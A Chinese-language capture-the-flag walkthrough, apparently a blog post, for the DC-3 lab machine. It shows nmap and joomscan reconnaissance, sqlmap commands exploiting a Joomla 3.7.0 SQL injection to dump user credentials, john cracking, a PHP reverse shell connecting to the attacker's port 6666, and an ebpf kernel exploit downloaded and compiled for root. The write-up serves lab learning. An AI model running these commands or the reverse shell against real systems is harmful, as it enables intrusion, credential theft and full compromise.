DC-3靶场思路

一.信息收集

扫描整个c段网络:nmap 192.168.1.0/24

在这里插入图片描述

//目标主机的IP地址:192.168.1.23
//攻击机地址:192.168.1.13

已知目标主机开放了80端口,访问,通过wappalyzer插件知道DC-3的cms事joomla,然后使用专门的针对joomla的工具进行扫描。
在这里插入图片描述

joomscan -u "http://192.168.1.23"

通过joomscan命令,知道joomla的版本是3.7.0
192.168.1.23的敏感目录有一个后台登陆管理路径http://192.168.1.23/administrator/
在这里插入图片描述

二.漏洞扫描

知道了joomla的版本是3.7.0
用kali自带的漏洞库进行扫描:searchsploit

使用命令
searchsploit joomla 3.7.0

在这里插入图片描述
看到有sql注入漏洞,将exp42033.txt提取出来

searchsploit -m 42033.txt

在这里插入图片描述

三,漏洞利用

在这里插入图片描述
有payload,直接sqlmap跑起来,注意要将原文中的localhost改为目标主机的IP地址

sqlmap -u "http://192.168.1.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch

在这里插入图片描述

sqlmap -u "http://192.168.1.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering] --batch

在这里插入图片描述

sqlmap -u "http://192.168.1.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering] 

在这里插入图片描述

sqlmap -u "http://192.168.1.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password --dump -p list[fullordering] --batch

在这里插入图片描述
这里密码是加密过的,用john解密,将密码写进一个文件里

`john 1.txt`
解的密码为:snoopy

前面我们得到后台管理的目录,用sqlmap跑出来的账号密码登陆
http://192.168.1.23/administrator/
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

php反弹shell
$sock = fsockopen("攻击机IP地址","6666");
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

在本地上监听6666端口,并访问http://192.168.1.23/index.php
在这里插入图片描述

交互式shell
python -c 'import pty; pty.spawn ("/bin/bash")' 

在这里插入图片描述

cd /root
权限不够!,现在我们要进行提权

四.权限提升

这里我们用到的是系统漏洞提权

/etc/*release	是系统安装时默认的发行版本信息
/proc/version    是系统内核信息
cat /proc/version
cat /etc/*release

在这里插入图片描述
可以看到Ubuntu 16.04 LTS 内核是Linux 4.4.0-21
searchsploit Ubuntu 16.04
在这里插入图片描述

searchsploit -m 39772.txt
cat 44300.txt

在这里插入图片描述将这个zip文件,转移到靶机中,两种方法

方法1:
在kali中下载
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
将下载的39772.zip移动到html目录下
mv 39772.zip /var/www/html
启动apache
systemctl start apache2.service
-----------------------------------------------------------------------------------------
在靶机中下载,wget http://192.168.1.13/39772.zip
解压,unzip 39772.zip
方法二
靶机先开启nc
nc -l 1234 > 39772.zip
----------------------------------------------------
kali中
nc 192.168.1.23 1234 <39772.zip
靶机
ctrl+z,回车

cd 39772
在这里插入图片描述

cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

在这里插入图片描述进入root目录
拿到flag
在这里插入图片描述

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值